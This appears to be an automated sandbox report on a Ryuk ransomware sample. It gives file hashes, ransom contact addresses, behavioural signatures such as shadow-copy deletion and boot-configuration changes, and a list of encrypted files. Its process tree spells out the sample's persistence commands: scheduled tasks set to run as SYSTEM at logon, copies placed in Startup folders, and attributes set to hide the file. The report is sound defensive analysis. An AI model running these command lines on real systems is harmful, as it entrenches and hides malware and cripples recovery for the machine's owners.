Analysis
-
max time kernel
151s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
21-09-2022 20:38
Static task
static1
Behavioral task
behavioral1
Sample
ryuk.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
ryuk.exe
Resource
win10v2004-20220812-en
General
-
Target
ryuk.exe
-
Size
885KB
-
MD5
35194c73ff38dd6c3bed7c0efcff6826
-
SHA1
1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
-
SHA256
5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
-
SHA512
cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f
-
SSDEEP
12288:CXrZ7kwy8U9JlpYqWYgeWYg955/155/0QebUlAAs7sKSAoSRn6X:C97ktflKgQKUKR7sKSAhN6
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
Recoverfile@aol.com
Recoverfile1@aol.com
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 4276 bcdedit.exe 3784 bcdedit.exe -
Processes:
wbadmin.exepid process 1424 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables taskbar notifications via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 3 IoCs
Processes:
attrib.execmd.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 42 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
ryuk.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\G: ryuk.exe File opened (read-only) \??\I: ryuk.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\M: ryuk.exe File opened (read-only) \??\N: ryuk.exe File opened (read-only) \??\P: ryuk.exe File opened (read-only) \??\S: ryuk.exe File opened (read-only) \??\U: ryuk.exe File opened (read-only) \??\V: ryuk.exe File opened (read-only) \??\A: ryuk.exe File opened (read-only) \??\W: ryuk.exe File opened (read-only) \??\Z: ryuk.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\E: ryuk.exe File opened (read-only) \??\J: ryuk.exe File opened (read-only) \??\H: ryuk.exe File opened (read-only) \??\L: ryuk.exe File opened (read-only) \??\O: ryuk.exe File opened (read-only) \??\X: ryuk.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\B: ryuk.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\F: ryuk.exe File opened (read-only) \??\Q: ryuk.exe File opened (read-only) \??\T: ryuk.exe File opened (read-only) \??\Y: ryuk.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\K: ryuk.exe File opened (read-only) \??\R: ryuk.exe -
Drops file in Program Files directory 64 IoCs
Processes:
ryuk.exedescription ioc process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_KMS_Client-ul.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_OEM_Perp-ul-phn.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\COPYRIGHT.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\GroupLimit.M2TS.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-phn.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\PREVIEW.GIF.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\selector.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Yellow Orange.xml.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Content.DATA.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest-ul-oob.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Grace-ppd.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f2\FA000000002.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\classlist.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-pl.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\office.x-none.msi.16.x-none.vreg.dat.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_OEM_Perp-ul-oob.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\SQLENGINEMESSAGES.XML.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\jquery.ui.touch-punch.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Grace-ppd.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-pl.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\illustrations.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSYUBIN7.DLL.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_checkbox_unselected_18.svg.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\close.svg.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\STSLIST.DLL.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\AppStore_icon.svg.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\AppStore_icon.svg.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\et.pak.DATA.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_Subscription-ppd.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019MSDNR_Retail-ul-oob.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ppd.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_school.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-100.png.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL102.XML.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxSelected.svg.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ppd.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Grace-ul-oob.xrm-ms.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\AssetLibrary.ico.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.js.[Recoverfile@aol.com].RYK ryuk.exe -
Drops file in Windows directory 5 IoCs
Processes:
ryuk.exewbadmin.exedescription ioc process File created C:\Windows\RyukReadMe.txt ryuk.exe File created C:\Windows\hrmlog1 ryuk.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 3760 sc.exe 4568 sc.exe 1716 sc.exe 2904 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3708 schtasks.exe 3600 schtasks.exe 2140 schtasks.exe 3292 schtasks.exe -
Interacts with shadow copies 2 TTPs 15 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 1908 vssadmin.exe 860 vssadmin.exe 1780 vssadmin.exe 4056 vssadmin.exe 3212 vssadmin.exe 3312 vssadmin.exe 3132 vssadmin.exe 4616 vssadmin.exe 3392 vssadmin.exe 4664 vssadmin.exe 1016 vssadmin.exe 4840 vssadmin.exe 4904 vssadmin.exe 1388 vssadmin.exe 1704 vssadmin.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3060 taskkill.exe 3940 taskkill.exe 4460 taskkill.exe 3560 taskkill.exe 1500 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings cmd.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 5008 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
ryuk.exepid process 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe 1352 ryuk.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
taskkill.exetaskkill.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 3060 taskkill.exe Token: SeDebugPrivilege 3940 taskkill.exe Token: SeIncreaseQuotaPrivilege 1796 WMIC.exe Token: SeSecurityPrivilege 1796 WMIC.exe Token: SeTakeOwnershipPrivilege 1796 WMIC.exe Token: SeLoadDriverPrivilege 1796 WMIC.exe Token: SeSystemProfilePrivilege 1796 WMIC.exe Token: SeSystemtimePrivilege 1796 WMIC.exe Token: SeProfSingleProcessPrivilege 1796 WMIC.exe Token: SeIncBasePriorityPrivilege 1796 WMIC.exe Token: SeCreatePagefilePrivilege 1796 WMIC.exe Token: SeBackupPrivilege 1796 WMIC.exe Token: SeRestorePrivilege 1796 WMIC.exe Token: SeShutdownPrivilege 1796 WMIC.exe Token: SeDebugPrivilege 1796 WMIC.exe Token: SeSystemEnvironmentPrivilege 1796 WMIC.exe Token: SeRemoteShutdownPrivilege 1796 WMIC.exe Token: SeUndockPrivilege 1796 WMIC.exe Token: SeManageVolumePrivilege 1796 WMIC.exe Token: 33 1796 WMIC.exe Token: 34 1796 WMIC.exe Token: 35 1796 WMIC.exe Token: 36 1796 WMIC.exe Token: SeBackupPrivilege 3544 vssvc.exe Token: SeRestorePrivilege 3544 vssvc.exe Token: SeAuditPrivilege 3544 vssvc.exe Token: SeIncreaseQuotaPrivilege 1796 WMIC.exe Token: SeSecurityPrivilege 1796 WMIC.exe Token: SeTakeOwnershipPrivilege 1796 WMIC.exe Token: SeLoadDriverPrivilege 1796 WMIC.exe Token: SeSystemProfilePrivilege 1796 WMIC.exe Token: SeSystemtimePrivilege 1796 WMIC.exe Token: SeProfSingleProcessPrivilege 1796 WMIC.exe Token: SeIncBasePriorityPrivilege 1796 WMIC.exe Token: SeCreatePagefilePrivilege 1796 WMIC.exe Token: SeBackupPrivilege 1796 WMIC.exe Token: SeRestorePrivilege 1796 WMIC.exe Token: SeShutdownPrivilege 1796 WMIC.exe Token: SeDebugPrivilege 1796 WMIC.exe Token: SeSystemEnvironmentPrivilege 1796 WMIC.exe Token: SeRemoteShutdownPrivilege 1796 WMIC.exe Token: SeUndockPrivilege 1796 WMIC.exe Token: SeManageVolumePrivilege 1796 WMIC.exe Token: 33 1796 WMIC.exe Token: 34 1796 WMIC.exe Token: 35 1796 WMIC.exe Token: 36 1796 WMIC.exe Token: SeDebugPrivilege 4460 taskkill.exe Token: SeDebugPrivilege 3560 taskkill.exe Token: SeDebugPrivilege 1500 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ryuk.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1352 wrote to memory of 2920 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 2920 1352 ryuk.exe cmd.exe PID 2920 wrote to memory of 3600 2920 cmd.exe schtasks.exe PID 2920 wrote to memory of 3600 2920 cmd.exe schtasks.exe PID 1352 wrote to memory of 2040 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 2040 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 3040 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 3040 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 2540 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 2540 1352 ryuk.exe cmd.exe PID 2540 wrote to memory of 2140 2540 cmd.exe schtasks.exe PID 2540 wrote to memory of 2140 2540 cmd.exe schtasks.exe PID 1352 wrote to memory of 4208 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 4208 1352 ryuk.exe cmd.exe PID 4208 wrote to memory of 4964 4208 cmd.exe attrib.exe PID 4208 wrote to memory of 4964 4208 cmd.exe attrib.exe PID 1352 wrote to memory of 4896 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 4896 1352 ryuk.exe cmd.exe PID 4896 wrote to memory of 3292 4896 cmd.exe schtasks.exe PID 4896 wrote to memory of 3292 4896 cmd.exe schtasks.exe PID 1352 wrote to memory of 4860 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 4860 1352 ryuk.exe cmd.exe PID 4860 wrote to memory of 3708 4860 cmd.exe schtasks.exe PID 4860 wrote to memory of 3708 4860 cmd.exe schtasks.exe PID 1352 wrote to memory of 2708 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 2708 1352 ryuk.exe cmd.exe PID 2708 wrote to memory of 5060 2708 cmd.exe attrib.exe PID 2708 wrote to memory of 5060 2708 cmd.exe attrib.exe PID 1352 wrote to memory of 4392 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 4392 1352 ryuk.exe cmd.exe PID 4392 wrote to memory of 3476 4392 cmd.exe attrib.exe PID 4392 wrote to memory of 3476 4392 cmd.exe attrib.exe PID 1352 wrote to memory of 4992 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 4992 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 1984 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 1984 1352 ryuk.exe cmd.exe PID 4992 wrote to memory of 1712 4992 cmd.exe cmd.exe PID 4992 wrote to memory of 1712 4992 cmd.exe cmd.exe PID 1984 wrote to memory of 1828 1984 cmd.exe reg.exe PID 1984 wrote to memory of 1828 1984 cmd.exe reg.exe PID 1352 wrote to memory of 2084 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 2084 1352 ryuk.exe cmd.exe PID 2084 wrote to memory of 4240 2084 cmd.exe cmd.exe PID 2084 wrote to memory of 4240 2084 cmd.exe cmd.exe PID 2084 wrote to memory of 3060 2084 cmd.exe taskkill.exe PID 2084 wrote to memory of 3060 2084 cmd.exe taskkill.exe PID 1352 wrote to memory of 3752 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 3752 1352 ryuk.exe cmd.exe PID 1712 wrote to memory of 4244 1712 cmd.exe icacls.exe PID 1712 wrote to memory of 4244 1712 cmd.exe icacls.exe PID 1352 wrote to memory of 4088 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 4088 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 3148 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 3148 1352 ryuk.exe cmd.exe PID 4240 wrote to memory of 3940 4240 cmd.exe taskkill.exe PID 4240 wrote to memory of 3940 4240 cmd.exe taskkill.exe PID 1352 wrote to memory of 2056 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 2056 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 2008 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 2008 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 3592 1352 ryuk.exe cmd.exe PID 1352 wrote to memory of 3592 1352 ryuk.exe cmd.exe PID 3592 wrote to memory of 3540 3592 cmd.exe reg.exe PID 3592 wrote to memory of 3540 3592 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 5 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 5060 attrib.exe 3476 attrib.exe 4076 attrib.exe 3696 attrib.exe 4964 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ryuk.exe"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\ryuk.exe3⤵
- Views/modifies file attributes
-
